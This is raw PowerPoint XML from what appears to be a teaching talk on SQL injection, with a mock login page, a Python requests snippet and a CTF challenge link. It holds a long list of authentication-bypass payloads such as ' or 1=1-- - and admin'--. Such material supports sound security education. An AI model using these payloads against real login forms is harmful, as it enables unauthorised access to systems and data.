              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Solution in real world: use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Good for learning experience/hard filtered injection: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-AU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roll your own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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39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all the things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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="1332904"/>
            <a:ext cx="112109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Using Python + requests</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-AU" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-AU" sz="44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8D7583-3DB3-4DC1-8CB4-51C642C9370B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="406912" y="2235991"/>
            <a:ext cx="11273398" cy="3525442"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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>
                <a:solidFill>
                  <a:srgbClr val="CC99FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url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  <a:r>
              <a:rPr lang="en-AU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  <a:r>
              <a:rPr lang="en-AU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https://vulnerable.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="3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/exists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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AU" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>params </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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{'</a:t>
            </a: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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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': "</a:t>
            </a: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or 1=1-- -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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"}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="3200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-AU" sz="3200" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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AU" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="638ACF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>requests</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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AU" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="638ACF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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AU" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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  <a:r>
              <a:rPr lang="en-AU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params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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AU" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="638ACF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>params</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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AU" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="638ACF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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AU" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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AU" sz="3200" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU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3D018-B601-4CA7-80FB-2C589223831B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333374" y="5866804"/>
            <a:ext cx="11210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Becomes a pure algorithmic challenge!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394475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Try it for yourself!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CBB15-2F61-44B5-AD77-15FFA3EF0781}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="333373" y="1332904"/>
            <a:ext cx="11715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a look at the challenge at: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http://167.71.243.144/bsqli/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-AU" sz="3200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6">
                  <a:lumMod val="40000"/>
                  <a:lumOff val="6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challenge has a long flag, don't do it by hand. Write a script.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It's a real achievement to do so for the first time.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 code is given.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Hint: Flag has upper and lower case and { } _</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10926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 Every SQL Injection Is Easy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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2630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Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plzzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4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92100-0CF4-4D21-B1D7-551D01AB88D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2777484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Username: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0E359-5E19-4716-A490-AA737AB6D8A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3221225"/>
            <a:ext cx="1662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43C2D8-6783-49E8-8FEE-FA05E140EE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491807" y="2860429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/>
              <a:t>guest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17FB60-3892-487C-A10F-12E8A191B755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491806" y="3300704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/>
              <a:t>*****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B32655-5B42-46FE-85DC-A5F1A2F18B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805882" y="3798234"/>
            <a:ext cx="1108643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10757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 Every SQL Injection Is Easy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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="389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Welcome guest!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9DC7FAB-5E9C-45EF-AFE2-40D822AA0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59" y="3429000"/>
            <a:ext cx="1627093" cy="16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0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 Every SQL Injection Is Easy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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2630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Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plzzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4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92100-0CF4-4D21-B1D7-551D01AB88D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2777484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Username: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0E359-5E19-4716-A490-AA737AB6D8A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3221225"/>
            <a:ext cx="1662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43C2D8-6783-49E8-8FEE-FA05E140EE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491807" y="2860429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/>
              <a:t>' or 1=1-- -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17FB60-3892-487C-A10F-12E8A191B755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491806" y="3300704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/>
              <a:t>************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B32655-5B42-46FE-85DC-A5F1A2F18B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805882" y="3798234"/>
            <a:ext cx="1108643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45692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 Every SQL Injection Is Easy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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2864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Nope, sorry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B1A4720-458C-4AD4-B599-794955F4F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94" y="3524049"/>
            <a:ext cx="1628976" cy="16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4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 Every SQL Injection Is Easy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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2630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Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plzzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4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92100-0CF4-4D21-B1D7-551D01AB88D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2777484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Username: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0E359-5E19-4716-A490-AA737AB6D8A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3221225"/>
            <a:ext cx="1662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43C2D8-6783-49E8-8FEE-FA05E140EE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491807" y="2860429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17FB60-3892-487C-A10F-12E8A191B755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491806" y="3300704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B32655-5B42-46FE-85DC-A5F1A2F18B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805882" y="3798234"/>
            <a:ext cx="1108643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Submit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362A8-0D98-42F5-A5FA-7593BB5B9359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20453174">
            <a:off x="1922402" y="-1526821"/>
            <a:ext cx="386715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'-'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 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'&amp;'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'^'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'*'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 or 1=1 limit 1 -- -+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'="or'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 or ''-'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 or '' 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 or ''&amp;'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 or ''^'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 or ''*'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'-||0'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"-||0"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"-"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" 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81D18-FAD6-4B71-9883-AF14635C9311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1921698">
            <a:off x="3734293" y="183956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or true--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" or true--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' or true--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") or true--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') or true--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' or 'x'='x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') or ('x')=('x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')) or (('x'))=(('x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" or "x"="x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") or ("x")=("x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")) or (("x"))=(("x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or 2 like 2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or 1=1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or 1=1--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or 1=1#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or 1=1/*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47382-F41E-42F6-A9AC-C2779788001E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21282622">
            <a:off x="7053796" y="-646599"/>
            <a:ext cx="6096000" cy="125880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admin' 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-- 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admin'/*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'2' LIKE '1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2 LIKE 2--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2 LIKE 2#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2 LIKE 2#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2 LIKE 2--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('2' LIKE '2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('2' LIKE '2'#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('2' LIKE '2'/*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'1'='1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'1'='1'--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'1'='1'#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'1'='1'/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin'or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1=1 or ''='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1=1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1=1--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1=1#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1=1/*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('1'='1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('1'='1'--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('1'='1'#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('1'='1'/*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'1'='1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'1'='1'--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'1'='1'#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'1'='1'/*</a:t>
            </a:r>
            <a:endParaRPr lang="en-A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 Every SQL Injection Is Easy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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2630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Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Plzzz</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU" sz="4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92100-0CF4-4D21-B1D7-551D01AB88D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2777484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Username: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0E359-5E19-4716-A490-AA737AB6D8A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="3221225"/>
            <a:ext cx="1662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43C2D8-6783-49E8-8FEE-FA05E140EE44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491807" y="2860429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17FB60-3892-487C-A10F-12E8A191B755}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2491806" y="3300704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B32655-5B42-46FE-85DC-A5F1A2F18B57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="805882" y="3798234"/>
            <a:ext cx="1108643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Submit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362A8-0D98-42F5-A5FA-7593BB5B9359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="20453174">
            <a:off x="1922402" y="-1526821"/>
            <a:ext cx="386715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'-'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 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'&amp;'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'^'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'*'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 or 1=1 limit 1 -- -+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'="or'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 or ''-'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 or '' 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 or ''&amp;'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 or ''^'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 or ''*'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'-||0'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"-||0"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"-"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" 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81D18-FAD6-4B71-9883-AF14635C9311}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1921698">
            <a:off x="3734293" y="183956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or true--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" or true--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' or true--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") or true--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') or true--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' or 'x'='x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') or ('x')=('x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')) or (('x'))=(('x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" or "x"="x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") or ("x")=("x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")) or (("x"))=(("x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or 2 like 2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or 1=1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or 1=1--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or 1=1#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or 1=1/*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47382-F41E-42F6-A9AC-C2779788001E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="21282622">
            <a:off x="7053796" y="-646599"/>
            <a:ext cx="6096000" cy="125880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admin' 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-- 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admin'/*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'2' LIKE '1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2 LIKE 2--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2 LIKE 2#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2 LIKE 2#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2 LIKE 2--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('2' LIKE '2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('2' LIKE '2'#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('2' LIKE '2'/*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'1'='1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'1'='1'--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'1'='1'#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'1'='1'/*</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin'or</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 1=1 or ''='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1=1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1=1--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1=1#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 or 1=1/*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('1'='1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('1'='1'--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('1'='1'#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('1'='1'/*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'1'='1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'1'='1'--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'1'='1'#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admin') or '1'='1'/*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81673C-FEC0-4E07-AB15-2E29B9F04CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257173" y="2941597"/>
            <a:ext cx="11658601" cy="1156647"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 20238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0" dirty="0"/>
              <a:t>…It's not vulnerable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7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4B7F56C8-D81A-4526-A04C-AB24A7FC3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233" y="2477431"/>
            <a:ext cx="2150059" cy="21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7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 Every SQL Injection Is Easy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560E58-5C39-4C60-B079-D23652DAD713}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="618565" y="1515035"/>
            <a:ext cx="5563160" cy="4942915"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3971"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="262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B64E6-E043-4271-AF36-0E62BECF1536}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="1622613"/>
            <a:ext cx="5372101" cy="376516"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 45638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https://vulnerable.com/login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B93B-092A-455C-8E87-4C3DF02D6A01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="723900" y="2106707"/>
            <a:ext cx="2630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Login </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="4400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
